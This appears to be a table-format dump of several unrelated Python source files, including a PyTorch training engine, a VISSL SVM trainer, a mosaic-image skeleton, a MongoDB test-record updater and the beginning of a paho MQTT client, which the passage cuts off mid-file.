source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
patcher_importlib_lock.py
|
from __future__ import print_function
import sys
import eventlet
# no standard tests in this file, ignore
__test__ = False
def do_import():
import encodings.idna
if __name__ == '__main__':
eventlet.monkey_patch()
threading = eventlet.patcher.original('threading')
sys.modules.pop('encodings.idna', None)
# call "import encodings.idna" in a new thread
thread = threading.Thread(target=do_import)
thread.start()
# call "import encodings.idna" in the main thread
do_import()
thread.join()
print('pass')
|
engine.py
|
import os
import math
import time
import torch
import datetime
import threading
import numpy as np
from ..lib import utils
from ..lib.options import Options
from ..lib.logger import Logger
class Engine(object):
"""Contains training and evaluation procedures
"""
def __init__(self):
self.hooks = {}
self.epoch = 0
self.dataset = None
self.model = None
self.optimizer = None
self.view = None
self.best_out = {}
# generate_view will be executed at the end of each
# training and evaluation epoch
self.register_hook('train_on_flush', self.generate_view)
self.register_hook('eval_on_flush', self.generate_view)
def generate_view(self):
""" Generate a view.html via an asynchronous call to `self.view.generate()`
"""
if self.view is not None:
if hasattr(self.view, 'current_thread') and self.view.current_thread.is_alive():
Logger()('Skipping view generation: another view is already being generated', log_level=Logger.WARNING)
Logger()('Consider removing batch entries from views.items in order to speed it up', log_level=Logger.WARNING)
else:
# TODO: Redesign this threading system so it wont slow down training
# Python threads don't really exist, because of the interpreter lock
# we might need multi-proessing or some other way.
self.view.current_thread = threading.Thread(target=self.view.generate)
self.view.current_thread.start()
# path_opts = os.path.join(Options()['exp']['dir'], 'options.yaml')
# os.system('python -m bootstrap.views.view --path_opts {}'.format(path_opts))
def load_state_dict(self, state):
self.epoch = state['epoch']
self.best_out = state['best_out']
def state_dict(self):
state = {}
state['epoch'] = self.epoch
state['best_out'] = self.best_out
return state
def hook(self, name):
""" Run all the callback functions that have been registered
for a hook.
Args:
name: the name of the hook
"""
if name in self.hooks:
for func in self.hooks[name]:
func()
def register_hook(self, name, func):
""" Register a callback function to be triggered when the hook
is called.
Args:
name: the name of the hook
func: the callback function (no argument)
Example usage:
.. code-block:: python
def func():
print('hooked!')
engine.register_hook('train_on_start_batch', func)
"""
if name not in self.hooks:
self.hooks[name] = []
self.hooks[name].append(func)
def resume(self, map_location=None):
""" Resume a checkpoint using the `bootstrap.lib.options.Options`
"""
Logger()('Loading {} checkpoint'.format(Options()['exp']['resume']))
self.load(Options()['exp']['dir'],
Options()['exp']['resume'],
self.model, self.optimizer,
map_location=map_location)
self.epoch += 1
def eval(self):
""" Launch evaluation procedures
"""
Logger()('Launching evaluation procedures')
if Options()['dataset']['eval_split']:
# self.epoch-1 to be equal to the same resumed epoch
# or to be equal to -1 when not resumed
self.eval_epoch(self.model, self.dataset['eval'], self.epoch - 1, logs_json=True)
Logger()('Ending evaluation procedures')
def train(self):
""" Launch training procedures
List of the hooks:
- train_on_start: before the full training procedure
"""
Logger()('Launching training procedures')
self.hook('train_on_start')
while self.epoch < Options()['engine']['nb_epochs']:
self.train_epoch(self.model, self.dataset['train'], self.optimizer, self.epoch)
if Options()['dataset']['eval_split']:
out = self.eval_epoch(self.model, self.dataset['eval'], self.epoch)
if 'saving_criteria' in Options()['engine'] and Options()['engine']['saving_criteria'] is not None:
for saving_criteria in Options()['engine']['saving_criteria']:
if self.is_best(out, saving_criteria):
name = saving_criteria.split(':')[0]
Logger()('Saving best checkpoint for strategy {}'.format(name))
self.save(Options()['exp']['dir'], 'best_{}'.format(name), self.model, self.optimizer)
Logger()('Saving last checkpoint')
self.save(Options()['exp']['dir'], 'last', self.model, self.optimizer)
self.epoch += 1
Logger()('Ending training procedures')
def train_epoch(self, model, dataset, optimizer, epoch, mode='train'):
""" Launch training procedures for one epoch
List of the hooks:
- train_on_start_epoch: before the training procedure for an epoch
- train_on_start_batch: before the training precedure for a batch
- train_on_forward: after the forward of the model
- train_on_backward: after the backward of the loss
- train_on_update: after the optimization step
- train_on_print: after the print to the terminal
- train_on_end_batch: end of the training procedure for a batch
- train_on_end_epoch: before saving the logs in logs.json
- train_on_flush: end of the training procedure for an epoch
"""
utils.set_random_seed(Options()['misc']['seed'] + epoch) # to be able to reproduce exps on reload
Logger()('Training model on {}set for epoch {}'.format(dataset.split, epoch))
model.train()
timer = {
'begin': time.time(),
'elapsed': time.time(),
'process': None,
'load': None,
'run_avg': 0
}
out_epoch = {}
batch_loader = dataset.make_batch_loader()
self.hook(f'{mode}_on_start_epoch')
for i, batch in enumerate(batch_loader):
timer['load'] = time.time() - timer['elapsed']
self.hook(f'{mode}_on_start_batch')
optimizer.zero_grad()
out = model(batch)
self.hook(f'{mode}_on_forward')
if not torch.isnan(out['loss']):
out['loss'].backward()
else:
Logger()('NaN detected')
# torch.cuda.synchronize()
self.hook(f'{mode}_on_backward')
optimizer.step()
# torch.cuda.synchronize()
self.hook(f'{mode}_on_update')
timer['process'] = time.time() - timer['elapsed']
if i == 0:
timer['run_avg'] = timer['process']
else:
timer['run_avg'] = timer['run_avg'] * 0.8 + timer['process'] * 0.2
Logger().log_value(f'{mode}_batch.epoch', epoch, should_print=False)
Logger().log_value(f'{mode}_batch.batch', i, should_print=False)
Logger().log_value(f'{mode}_batch.timer.process', timer['process'], should_print=False)
Logger().log_value(f'{mode}_batch.timer.load', timer['load'], should_print=False)
for key, value in out.items():
if torch.is_tensor(value):
if value.numel() <= 1:
value = value.item() # get number from a torch scalar
else:
continue
if isinstance(value, (list, dict, tuple)):
continue
if key not in out_epoch:
out_epoch[key] = []
out_epoch[key].append(value)
Logger().log_value(f'{mode}_batch.' + key, value, should_print=False)
if i % Options()['engine']['print_freq'] == 0 or i == len(batch_loader) - 1:
Logger()("{}: epoch {} | batch {}/{}".format(mode, epoch, i, len(batch_loader) - 1))
Logger()("{} elapsed: {} | left: {}".format(
' ' * len(mode),
datetime.timedelta(seconds=math.floor(time.time() - timer['begin'])),
datetime.timedelta(seconds=math.floor(timer['run_avg'] * (len(batch_loader) - 1 - i)))))
Logger()("{} process: {:.5f} | load: {:.5f}".format(' ' * len(mode), timer['process'], timer['load']))
Logger()("{} loss: {:.5f}".format(' ' * len(mode), out['loss'].data.item()))
self.hook(f'{mode}_on_print')
timer['elapsed'] = time.time()
self.hook(f'{mode}_on_end_batch')
Logger().log_value(f'{mode}_epoch.epoch', epoch, should_print=True)
for key, value in out_epoch.items():
Logger().log_value(f'{mode}_epoch.' + key, np.asarray(value).mean(), should_print=True)
self.hook(f'{mode}_on_end_epoch')
Logger().flush()
self.hook(f'{mode}_on_flush')
def eval_epoch(self, model, dataset, epoch, mode='eval', logs_json=True):
""" Launch evaluation procedures for one epoch
List of the hooks (``mode='eval'`` by default):
- mode_on_start_epoch: before the evaluation procedure for an epoch
- mode_on_start_batch: before the evaluation precedure for a batch
- mode_on_forward: after the forward of the model
- mode_on_print: after the print to the terminal
- mode_on_end_batch: end of the evaluation procedure for a batch
- mode_on_end_epoch: before saving the logs in logs.json
- mode_on_flush: end of the evaluation procedure for an epoch
Returns:
out(dict): mean of all the scalar outputs of the model, indexed by output name, for this epoch
"""
utils.set_random_seed(Options()['misc']['seed'] + epoch) # to be able to reproduce exps on reload
Logger()('Evaluating model on {}set for epoch {}'.format(dataset.split, epoch))
model.eval()
timer = {
'begin': time.time(),
'elapsed': time.time(),
'process': None,
'load': None,
'run_avg': 0
}
out_epoch = {}
batch_loader = dataset.make_batch_loader()
self.hook('{}_on_start_epoch'.format(mode))
for i, batch in enumerate(batch_loader):
timer['load'] = time.time() - timer['elapsed']
self.hook('{}_on_start_batch'.format(mode))
with torch.no_grad():
out = model(batch)
# torch.cuda.synchronize()
self.hook('{}_on_forward'.format(mode))
timer['process'] = time.time() - timer['elapsed']
if i == 0:
timer['run_avg'] = timer['process']
else:
timer['run_avg'] = timer['run_avg'] * 0.8 + timer['process'] * 0.2
Logger().log_value('{}_batch.batch'.format(mode), i, should_print=False)
Logger().log_value('{}_batch.epoch'.format(mode), epoch, should_print=False)
Logger().log_value('{}_batch.timer.process'.format(mode), timer['process'], should_print=False)
Logger().log_value('{}_batch.timer.load'.format(mode), timer['load'], should_print=False)
for key, value in out.items():
if torch.is_tensor(value):
if value.dim() <= 1:
value = value.item() # get number from a torch scalar
else:
continue
if isinstance(value, (list, dict, tuple)):
continue
if key not in out_epoch:
out_epoch[key] = []
out_epoch[key].append(value)
Logger().log_value('{}_batch.{}'.format(mode, key), value, should_print=False)
if i % Options()['engine']['print_freq'] == 0:
Logger()("{}: epoch {} | batch {}/{}".format(mode, epoch, i, len(batch_loader) - 1))
Logger()("{} elapsed: {} | left: {}".format(
' ' * len(mode),
datetime.timedelta(seconds=math.floor(time.time() - timer['begin'])),
datetime.timedelta(seconds=math.floor(timer['run_avg'] * (len(batch_loader) - 1 - i)))))
Logger()("{} process: {:.5f} | load: {:.5f}".format(' ' * len(mode), timer['process'], timer['load']))
self.hook('{}_on_print'.format(mode))
timer['elapsed'] = time.time()
self.hook('{}_on_end_batch'.format(mode))
out = {}
for key, value in out_epoch.items():
out[key] = sum(value) / len(value)
Logger().log_value('{}_epoch.epoch'.format(mode), epoch, should_print=True)
for key, value in out.items():
Logger().log_value('{}_epoch.{}'.format(mode, key), value, should_print=True)
self.hook('{}_on_end_epoch'.format(mode))
if logs_json:
Logger().flush()
self.hook('{}_on_flush'.format(mode))
return out
def is_best(self, out, saving_criteria):
""" Verify if the last model is the best for a specific saving criteria
Args:
out(dict): mean of all the scalar outputs of model indexed by output name
saving_criteria(str):
Returns:
is_best(bool)
Example usage:
.. code-block:: python
out = {
'loss': 0.2,
'acctop1': 87.02
}
engine.is_best(out, 'loss:min')
"""
if ':min' in saving_criteria:
name = saving_criteria.replace(':min', '')
order = '<'
elif ':max' in saving_criteria:
name = saving_criteria.replace(':max', '')
order = '>'
else:
error_msg = """'--engine.saving_criteria' named '{}' does not specify order,
you need to chose between '{}' or '{}' to specify if the criteria needs to be minimize or maximize""".format(
saving_criteria, saving_criteria + ':min', saving_criteria + ':max')
raise ValueError(error_msg)
if name not in out:
raise KeyError("'--engine.saving_criteria' named '{}' not in outputs '{}'".format(name, list(out.keys())))
if name not in self.best_out:
self.best_out[name] = out[name]
return True
else:
if eval('{} {} {}'.format(out[name], order, self.best_out[name])):
self.best_out[name] = out[name]
return True
return False
def load(self, dir_logs, name, model, optimizer, map_location=None):
""" Load a checkpoint
Args:
dir_logs: directory of the checkpoint
name: name of the checkpoint
model: model associated to the checkpoint
optimizer: optimizer associated to the checkpoint
"""
path_template = os.path.join(dir_logs, 'ckpt_{}_{}.pth.tar')
Logger()('Loading model...')
model_state = torch.load(path_template.format(name, 'model'), map_location=map_location)
model.load_state_dict(model_state)
if Options()['dataset']['train_split'] is not None:
if os.path.isfile(path_template.format(name, 'optimizer')):
Logger()('Loading optimizer...')
optimizer_state = torch.load(path_template.format(name, 'optimizer'), map_location=map_location)
optimizer.load_state_dict(optimizer_state)
else:
Logger()('No optimizer checkpoint', log_level=Logger.WARNING)
if os.path.isfile(path_template.format(name, 'engine')):
Logger()('Loading engine...')
engine_state = torch.load(path_template.format(name, 'engine'), map_location=map_location)
self.load_state_dict(engine_state)
else:
Logger()('No engine checkpoint', log_level=Logger.WARNING)
def save(self, dir_logs, name, model, optimizer):
""" Save a checkpoint
Args:
dir_logs: directory of the checkpoint
name: name of the checkpoint
model: model associated to the checkpoint
optimizer: optimizer associated to the checkpoint
"""
path_template = os.path.join(dir_logs, 'ckpt_{}_{}.pth.tar')
Logger()('Saving model...')
model_state = model.state_dict()
torch.save(model_state, path_template.format(name, 'model'))
Logger()('Saving optimizer...')
optimizer_state = optimizer.state_dict()
torch.save(optimizer_state, path_template.format(name, 'optimizer'))
Logger()('Saving engine...')
engine_state = self.state_dict()
torch.save(engine_state, path_template.format(name, 'engine'))
|
svm_trainer.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import pickle
import threading
import numpy as np
from iopath.common.file_io import g_pathmgr
from sklearn.model_selection import cross_val_score
from sklearn.svm import LinearSVC
from vissl.utils.io import load_file, save_file
from vissl.utils.svm_utils.evaluate import get_precision_recall
# Turning it into a class to encapsulate the training and evaluation logic
# together unlike OSS benchmark which has 3 scripts.
class SVMTrainer(object):
"""
SVM trainer that takes care of training (using k-fold cross validation),
and evaluating the SVMs
"""
def __init__(self, config, layer, output_dir):
self.config = config
self.normalize = config["normalize"]
self.layer = layer
self.output_dir = self._get_output_dir(output_dir)
self.costs_list = self._get_costs_list()
self.train_ap_matrix = None
self.cls_list = []
def _get_output_dir(self, cfg_out_dir):
odir = f"{cfg_out_dir}/{self.layer}"
g_pathmgr.mkdirs(odir)
logging.info(f"Output directory for SVM results: {odir}")
return odir
def load_input_data(self, data_file, targets_file):
"""
Given the input data (features) and targets (labels) files, load the
features of shape N x D and labels of shape (N,)
"""
assert g_pathmgr.exists(data_file), "Data file not found. Abort!"
assert g_pathmgr.exists(targets_file), "Targets file not found. Abort!"
# load the features and the targets
logging.info("loading features and targets...")
targets = load_file(targets_file)
features = np.array(load_file(data_file)).astype(np.float64)
assert features.shape[0] == targets.shape[0], "Mismatched #images"
logging.info(f"Loaded features: {features.shape} and targets: {targets.shape}")
return features, targets
def _normalize_features(self, features):
"""
Normalize the features.
"""
feats_norm = np.linalg.norm(features, axis=1)
features = features / (feats_norm + 1e-5)[:, np.newaxis]
return features
def _get_costs_list(self):
"""
Costs values for which SVM training is done. We take costs values
specified in the costs_list input in the config file. Additionally,
costs specified to be the powers of a base value are also added
(assuming the base value is > 0).
"""
costs_list = self.config["costs"]["costs_list"]
# we append more costs to the output based on power function
if self.config["costs"]["base"] > 0.0:
base = self.config["costs"]["base"]
start_num, end_num = self.config["costs"]["power_range"]
for num in range(start_num, end_num):
costs_list.append(base**num)
self.costs_list = costs_list
logging.info("Training SVM for costs: {}".format(costs_list))
return costs_list
def _get_cls_list(self, targets):
num_classes = targets.shape[1]
cls_list = range(num_classes)
if len(self.config["cls_list"]) > 0:
cls_list = [int(cls_num) for cls_num in self.config["cls_list"]]
self.cls_list = cls_list
logging.info("Training SVM for classes: {}".format(self.cls_list))
return cls_list
def _get_svm_model_filename(self, cls_num, cost):
cls_cost = str(cls_num) + "_cost" + str(float(cost))
out_file = f"{self.output_dir}/cls{cls_cost}.pickle"
ap_matrix_out_file = f"{self.output_dir}/AP_cls{cls_cost}.npy"
return out_file, ap_matrix_out_file
def get_best_cost_value(self):
"""
During the SVM training, we write the cross vaildation
AP value for training at each class and cost value
combination. We load the AP values and for each
class, determine the cost value that gives the maximum
AP. We return the chosen cost values for each class as a
numpy matrix.
"""
crossval_ap_file = f"{self.output_dir}/crossval_ap.npy"
chosen_cost_file = f"{self.output_dir}/chosen_cost.npy"
if g_pathmgr.exists(crossval_ap_file) and g_pathmgr.exists(chosen_cost_file):
self.chosen_cost = load_file(chosen_cost_file)
self.train_ap_matrix = load_file(crossval_ap_file)
return self.chosen_cost
if self.train_ap_matrix is None:
num_classes = len(self.cls_list)
self.train_ap_matrix = np.zeros((num_classes, len(self.costs_list)))
for cls_num in range(num_classes):
for cost_idx in range(len(self.costs_list)):
cost = self.costs_list[cost_idx]
_, ap_out_file = self._get_svm_model_filename(cls_num, cost)
self.train_ap_matrix[cls_num][cost_idx] = float(
load_file(ap_out_file)[0]
)
argmax_cls = np.argmax(self.train_ap_matrix, axis=1)
chosen_cost = [self.costs_list[idx] for idx in argmax_cls]
logging.info(f"chosen_cost: {chosen_cost}")
save_file(np.array(self.train_ap_matrix), crossval_ap_file)
save_file(np.array(chosen_cost), chosen_cost_file)
logging.info(f"saved crossval_ap AP to file: {crossval_ap_file}")
logging.info(f"saved chosen costs to file: {chosen_cost_file}")
self.chosen_cost = chosen_cost
return np.array(chosen_cost)
def train_cls(self, features, targets, cls_num):
"""
Train SVM on the input features and targets for a given class.
The SVMs are trained for all costs values for the given class. We
also save the cross-validation AP at each cost value for the given
class.
"""
logging.info(f"Training cls: {cls_num}")
for cost_idx in range(len(self.costs_list)):
cost = self.costs_list[cost_idx]
out_file, ap_out_file = self._get_svm_model_filename(cls_num, cost)
if (
g_pathmgr.exists(out_file)
and g_pathmgr.exists(ap_out_file)
and not self.config.force_retrain
):
logging.info(f"SVM model exists: {out_file}")
logging.info(f"AP file exists: {ap_out_file}")
continue
logging.info(f"Training model with the cost: {cost} cls: {cls_num}")
clf = LinearSVC(
C=cost,
class_weight={1: 2, -1: 1},
intercept_scaling=1.0,
verbose=1,
penalty=self.config["penalty"],
loss=self.config["loss"],
tol=0.0001,
dual=self.config["dual"],
max_iter=self.config["max_iter"],
)
cls_labels = targets[:, cls_num].astype(dtype=np.int32, copy=True)
# meaning of labels in VOC/COCO original loaded target files:
# label 0 = not present, set it to -1 as svm train target
# label 1 = present. Make the svm train target labels as -1, 1.
cls_labels[np.where(cls_labels == 0)] = -1
num_positives = len(np.where(cls_labels == 1)[0])
num_negatives = len(cls_labels) - num_positives
logging.info(
f"cls: {cls_num} has +ve: {num_positives} -ve: {num_negatives} "
f"ratio: {float(num_positives) / num_negatives} "
f"features: {features.shape} cls_labels: {cls_labels.shape}"
)
ap_scores = cross_val_score(
clf,
features,
cls_labels,
cv=self.config["cross_val_folds"],
scoring="average_precision",
)
self.train_ap_matrix[cls_num][cost_idx] = ap_scores.mean()
clf.fit(features, cls_labels)
logging.info(
f"cls: {cls_num} cost: {cost} AP: {ap_scores} "
f"mean:{ap_scores.mean()}"
)
logging.info(f"Saving cls cost AP to: {ap_out_file}")
save_file(np.array([ap_scores.mean()]), ap_out_file)
logging.info(f"Saving SVM model to: {out_file}")
with g_pathmgr.open(out_file, "wb") as fwrite:
pickle.dump(clf, fwrite)
def train(self, features, targets):
"""
Train SVMs on the given features and targets for all classes and all the
costs values.
"""
logging.info("Training SVM")
if self.normalize:
# normalize the features: N x 9216 (example shape)
features = self._normalize_features(features)
# get the class lists to train: whether all or some
self.cls_list = self._get_cls_list(targets)
self.train_ap_matrix = np.zeros((len(self.cls_list), len(self.costs_list)))
threads = []
for cls_idx in range(len(self.cls_list)):
cls_num = self.cls_list[cls_idx]
threads.append(
threading.Thread(
target=self.train_cls, args=(features, targets, cls_num)
)
)
for t in threads:
t.start()
for t in threads:
t.join()
def test(self, features, targets):
"""
Test the trained SVM models on the test features and targets values.
We use the cost per class that gives the maximum cross validation AP on
the training and load the correspond trained SVM model for the cost value
and the class.
Log the test ap to stdout and also save the AP in a file.
"""
logging.info("Testing SVM")
# normalize the features: N x 9216 (example shape)
if self.normalize:
# normalize the features: N x 9216 (example shape)
features = self._normalize_features(features)
num_classes = targets.shape[1]
logging.info("Num test classes: {}".format(num_classes))
# get the chosen cost that maximizes the cross-validation AP per class
costs_list = self.get_best_cost_value()
ap_matrix = np.zeros((num_classes, 1))
for cls_num in range(num_classes):
cost = costs_list[cls_num]
logging.info(f"Testing model for cls: {cls_num} cost: {cost}")
model_file, _ = self._get_svm_model_filename(cls_num, cost)
model = load_file(model_file)
prediction = model.decision_function(features)
cls_labels = targets[:, cls_num]
# meaning of labels in VOC/COCO original loaded target files:
# label 0 = not present, set it to -1 as svm train target
# label 1 = present. Make the svm train target labels as -1, 1.
evaluate_data_inds = targets[:, cls_num] != -1
eval_preds = prediction[evaluate_data_inds]
eval_cls_labels = cls_labels[evaluate_data_inds]
eval_cls_labels[np.where(eval_cls_labels == 0)] = -1
P, R, score, ap = get_precision_recall(eval_cls_labels, eval_preds)
ap_matrix[cls_num][0] = ap
logging.info(f"Mean test AP: {np.mean(ap_matrix, axis=0)}")
test_ap_filepath = f"{self.output_dir}/test_ap.npy"
save_file(np.array(ap_matrix), test_ap_filepath)
logging.info(f"saved test AP to file: {test_ap_filepath}")
|
mosaic_image.py
|
import numpy as np
import cv2
from imutils import resize
import threading
from mosaic_maker.image_processor import ImageProcessor
from mosaic_maker.patch import Patch
class MosaicImage:
def __init__(self, image, patch_size, pach_picker):
self.original_image = image
self.patch_size = patch_size
self.patch_picker = pach_picker
self.target_image = self._crop_image_to_patch_size(image.copy(), patch_size)
self.target_sobel_image = ImageProcessor.calculate_sobel_magnitude_image(self.target_image)
self.processing_image = False
@staticmethod
def _crop_image_to_patch_size(image, patch_size):
# ToDo crop image so it is divisible by patch_size
# https://docs.scipy.org/doc/numpy-dev/user/quickstart.html
return image
def compose_mosaic(self):
print('BUILDING MOSAIC')
target_image = self.target_image
target_sobel_image = self.target_sobel_image
mosaic = np.zeros(target_image.shape, np.uint8)
sobel_mosaic = np.zeros(target_sobel_image.shape, np.uint8)
(height, width) = target_image.shape[:2]
target_image_copy = target_image.copy()
target_sobel_image_copy = target_sobel_image.copy()
self.processing_image = True
threading.Thread(target=lambda: self._compose_mosaic_for(width, height, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy)).start()
self._progress_display_loop(mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy)
return mosaic
def _compose_mosaic_for(self, width, height, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy):
for y in range(0, height, self.patch_size):
for x in range(0, width, self.patch_size):
self._select_patch_for(x, y, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy)
self.processing_image = False
def _select_patch_for(self, x, y, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy):
# ToDo create patch for current position
# ToDo select patch from patch picker
# ToDo update mosaic and draw current window on images copies
# https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html#rectangle
return
def _progress_display_loop(self, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy):
while self.processing_image:
cv2.imshow('current target window', resize(target_image_copy, width=400))
cv2.imshow('current sobel target window', resize(target_sobel_image_copy, width=400))
cv2.imshow('mosaic', resize(mosaic, width=400))
cv2.imshow('sobel mosaic', resize(sobel_mosaic, width=400))
cv2.waitKey(10)
|
update_submission_record_tool.py
|
#!/usr/bin/python
import threading
import pymongo
import numpy as np
import pdb
import time
from bson.objectid import ObjectId
MONGO_DB = 'copo_mongo'
MONGO_HOST = '127.0.0.1'
MONGO_PORT = 27017
collection_name = 'test_submisson_progress_collection'
collection = pymongo.MongoClient(MONGO_HOST, MONGO_PORT)[MONGO_DB][collection_name]
mu = 40
sigma = 4
the_ids = list()
the_ids.append(ObjectId("5739f36a68236b8ca9e54011"))
the_ids.append(ObjectId("573c96df68236bd7a2ba132b"))
the_ids.append(ObjectId("573dd99568236b09876bb411"))
the_ids.append(ObjectId("573ef76968236b2e3909779b"))
the_ids.append(ObjectId("5745851468236ba373c72914"))
loops = 50000
def update_submission_record():
print('starting thread')
x = 0
for idx, i in enumerate(the_ids):
collection.remove({'sub_id': i})
collection.insert(
{
'sub_id': i,
'complete': idx * 25,
'speeds': []
}
)
while x < loops:
for idx, i in enumerate(the_ids):
collection.update(
{'sub_id': i},
{
'$push': {'speeds': np.cos(x) * idx + 1}, # make sine wave for each collection, increasing in both amplitude and frequency
'$set': {'complete': float(x * idx + 1)/2 % 100}
}
)
time.sleep(1.0/2.0)
print('loop: ' + str(x))
x = x + 1
update_submission_record()
#t = threading.Thread(target=update_submission_record)
#t.daemon = True
#t.start()
#print('threads submitted')
|
client.py
|
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import errno
import platform
import random
import select
import socket
HAVE_SSL = True
try:
import ssl
cert_reqs = ssl.CERT_REQUIRED
tls_version = ssl.PROTOCOL_TLSv1
except:
HAVE_SSL = False
cert_reqs = None
tls_version = None
import struct
import sys
import threading
import time
HAVE_DNS = True
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
# AWS WSS implementation
import core.protocol.paho.securedWebsocket.securedWebsocketCore as wssCore
import core.util.progressiveBackoffCore as backoffCore
import core.util.offlinePublishQueue as offlinePublishQueue
VERSION_MAJOR=1
VERSION_MINOR=0
VERSION_REVISION=0
VERSION_NUMBER=(VERSION_MAJOR*1000000+VERSION_MINOR*1000+VERSION_REVISION)
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] < 3:
PROTOCOL_NAMEv31 = "MQIsdp"
PROTOCOL_NAMEv311 = "MQTT"
else:
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish= 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
# MessageQueueing DropBehavior
MSG_QUEUEING_DROP_OLDEST = 0
MSG_QUEUEING_DROP_NEWEST = 1
if sys.version_info[0] < 3:
sockpair_data = "0"
else:
sockpair_data = b"0"
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == 0:
return "Connection Accepted."
elif connack_code == 1:
return "Connection Refused: unacceptable protocol version."
elif connack_code == 2:
return "Connection Refused: identifier rejected."
elif connack_code == 3:
return "Connection Refused: broker unavailable."
elif connack_code == 4:
return "Connection Refused: bad user name or password."
elif connack_code == 5:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
def _socketpair_compat():
